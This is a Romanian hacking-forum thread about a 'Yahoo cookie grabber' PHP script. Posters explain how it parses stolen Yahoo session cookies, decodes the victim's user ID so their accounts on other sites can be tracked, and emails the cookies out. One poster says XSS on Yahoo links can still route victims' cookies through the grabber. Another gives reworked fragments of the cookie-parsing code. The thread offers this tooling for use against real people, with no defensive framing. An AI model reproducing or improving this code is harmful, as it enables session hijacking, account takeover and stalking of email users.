Jump to content
Guest Nemessis

[RST] Professional Yahoo Cookie Grabber [de actualitate]

By Guest Nemessis, in Proiecte RST

Recommended Posts

decode Newbie

decode

Posted
Posted

am si eu o intrebare pentru Nemessis:

la grebber.php tot ce ai facut acolo mi se pare foarte interesant, dar ce e cu mailu ala din cod :"buni@yahoo.com"

nu cumva e un e-mail de al tau?

scuze daca ti se pare ca te subestimez dar buni@yahoo.com chiar exista si asta ma facut sa ma gandesc de 2 ori inainte de a folosi cookie grabberul tau. :)

Link to comment
Share on other sites
tw8 Newbie

tw8

Posted
Posted
am si eu o intrebare pentru Nemessis:

la grebber.php tot ce ai facut acolo mi se pare foarte interesant, dar ce e cu mailu ala din cod :"buni@yahoo.com"

nu cumva e un e-mail de al tau?

scuze daca ti se pare ca te subestimez dar buni@yahoo.com chiar exista si asta ma facut sa ma gandesc de 2 ori inainte de a folosi cookie grabberul tau. :)

In caz ca ai habar cat de cat de PHP, uite lamurirea. In cod apare asa:

Dupa cum poti vedea tot din cod (nu mai dau citat) $buni va contine la sfarsit decodarea ID-ului din cookie. Astfel, acel $buni are ca scop doar sa te ajute sa cauti pe siteurile mai folosite (google, myspace etc) conturi ale aceleiasi persoane.

Bafta, si data viitoare nu te mai grabi sa tragi concluzii ;).

Link to comment
Share on other sites
loki Newbie

loki

Posted
Posted
Am si eu o rugaminte. Daca nu la restul, macar la partea cu anul, ca zgarie ochii.

$year = "37";
$realYear = base_convert( $year, 32, 10 ) + 1900;

eu bagai asa la restul

$string1="0123456789abcdefghijklmnopqrstuvwxyz+_.";
$string2="abcdefghijklmnopqrstuvwxyz0123456789 _.";
for ($i=0; $i<strlen($neah); $buni.=$string2[strpos($string1,$neah[$i++])]);

iar la year

$year=strpos($string1,$str{1})*32+1900+strpos($string1,$str{2});

Grabberele nu mor, moare xss-ul, e destul un alt link yahoo sa dea alert si ii schimbi codita sa treaca prin grabber.

Partea cu mailul is curios daca ii merge cuiva de pe compul personal. Ca pan la urma am gasit pe unde e blacklisted RDS-ul de nu pleaca mailuri.

Link to comment
Share on other sites
loki Newbie

loki

Posted
Posted
pentru mail ar trebui sa ai un smtp server configurat in php.ini, fie sa folosesti un client de smtp propriu.

Mie mi-a mers pana asta vara. De atunci nici windows nu am pus, php.ini e configurat ca atunci. Cu toate astea adio smtp local. Cred ca e si din cauza unui virus din-ala care a dat cu mail la toate neamurile adressbookului

Link to comment
Share on other sites
dblackshell Newbie

dblackshell

Posted
Posted

alternativa ("infrumusetare cod") pentru cei ce vor :blush:


if(strstr($cookie, 'v=1') and strstr($cookie, 'z=')){
//-alternativa->
if(!(strstr($cookie, 'v=1')&&strstr($cookie, 'z='))) exit;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

$cookie = ereg_replace('&p=0', '', $cookie);
//-alternativa->
$cookie = str_replace('&p=0', '', $cookie);
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

$Y = explode('Y=', $cookie);
$Y = $Y[1];
$Y = explode(';', $Y);
$Y = $Y[0];
//-alternativa->
$Y = explode('Y=', $cookie);
$Y = current(explode(';', $Y[1]));
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

$T = explode('T=', $cookie);
$T = $T[1];
$T = explode(';', $T);
$T = $T[0];
//-alternativa->
$T = explode('T=', $cookie);
$T = current(explode(';', $T[1]));
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

$d=explode('l=', $mata, -1);
$c=explode('/o', $d[1], -1);
$neah=$c[0];
//-alternativa->
$d = explode('l=', $mata, -1);
$neah = current(explode('/o', $d[1], -1));
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

for ($i=0; $i<strlen($neah); $i++)
{
if ($neah[$i]=="0") { $buni.="a"; }
if ($neah[$i]=="1") { $buni.="b"; }
if ($neah[$i]=="2") { $buni.="c"; }
if ($neah[$i]=="3") { $buni.="d"; }
if ($neah[$i]=="4") { $buni.="e"; }
...etc...
//-alternativa->
$val = array(
	'0' => 'a',
	'1' => 'b',
	'2' => 'c',
	'3' => 'd',
	'4' => 'e',
	...etc...
);
$buni = '';
foreach($neah as $value) {
	$buni .= $val[$value];
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////

se pot reaplica infrumusatirile ulterioare in mare parte a codului precum si


$y = ereg_replace(';', '',$Y);
$y = ereg_replace('&', '%26',$y);
$y = ereg_replace('=', '%3D',$y);
//-alternativa->
$search = array(';', '&', '=');
$replace = array('', '%26', '%3D');
$y = str_replace($search, $replace, $Y);
//-alternativa--my-fav-(arata misto)->
$y = str_replace(
	';',
	'',
	str_replace(
		'&',
		'%26',
		str_replace(
			'=',
			'%3D',
			$Y
		)
	)
);
//vam zis ca arata misto

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...